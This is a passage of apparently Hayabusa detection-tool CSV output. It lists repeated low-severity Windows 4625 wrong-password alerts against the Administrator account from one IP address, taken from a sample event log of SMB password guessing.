Password,User: Administrator | Type: 3 | Computer: sKP8G2VgJlrr9LMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvOsNQpk3c5p1FgK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7oz7NPh5Z8UrDPW | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvzNFOLBlBv98Do4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KJmYytO30Icc6Rb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zro3jLjFXWZ2o8VL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Z2J8VYeuxd9fKcG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXMjOKLfMex7OmMv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.085 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgbm3YeoGxCa22Il | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7MEstBFjiWhVE18 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8Y2kDEiMZWf0znn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBAFVgPIOyCvtdRs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s3pFhUcspF6lzQXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39LFXXW715pQoADC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: in4ewyxouUnxQzCQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOtV8CLIU6Mcw2ty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8NJqimhGrg9uhTh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XEWLTOY9magV0h6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Di1MZsJx52Bi8E6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.536 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22MdB2QodynfibkF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qojej3YITXvXJ6Pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CLjbQ6timbdQoufd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aZgoAnGEFwXN88bQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZFWoL9XUMJdfNnY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x000TRnXfVtPAQSE | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNHWWHDOpXQyNdrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1irbPdOoUfvq1MXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dCflbKOMPJRXQHsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zuy6nD4EXeGzEy5e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xkig4u0LIS9v3HMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.029 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94RbUrUcMf6VhP8A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X9f7wCJ3wI9RmZTL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkVs1viGo4RxhFaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKMLt6t01vUDDq1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYSif8ADOkC8aInB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EpmraSe2sxFVupTy | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VPtfy3AxXpt9D3bx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRMOrE0Ba983q0Jv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQ0nkyTAeJt3dCpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2fdsRMU9SMm1KpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3kliEPBsbsYNI7yG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.580 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gEKFGsRvvlzulxR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M6oUbT8LvS7JNCq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E4dxHwRQVR7iBWa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VRygirU257VfFcR5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6H6i0wkjvWkU6cmp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W4Nh7bYfVvx30hVF | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQEsO4GpVjO5xpRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9ZlpSBwq0tLAgzm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65Piip53B1AiSBqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bh7SfuheoykW7Aym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tWdm76C4nL6tkU0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.065 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u2WEqTrg3A760Axt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyqhXspTlWwVCwA3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rkidbQJmvQr35Jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zr92VsL1YgHVehnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQP1K9rHrOyL0TOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LR783q3o34oLQLTI | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6NCTNhcghRGWf1qi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CVJdStLdKDbUICyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luAoVhEj1rOgZBfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OrqmovxoEEjLCaYV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AIP4mDSVhM27IAIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.537 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cym5lXDK01XuJz2b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7pYXA1Ic6BOfG31o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b722QrTSVoZGfiK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NzRFz4L7dpar794B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pLWuw9eMN9rqm0Ic | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sE7pzfiKRfOb2dH5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxL1cV8OiFVRfj4I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHs8Z8XPLg58jZ1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6kRLlJt3Oxwhdgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s4kTwriHAKVsTqzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jfitpZ5ZrzBfpNf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.984 
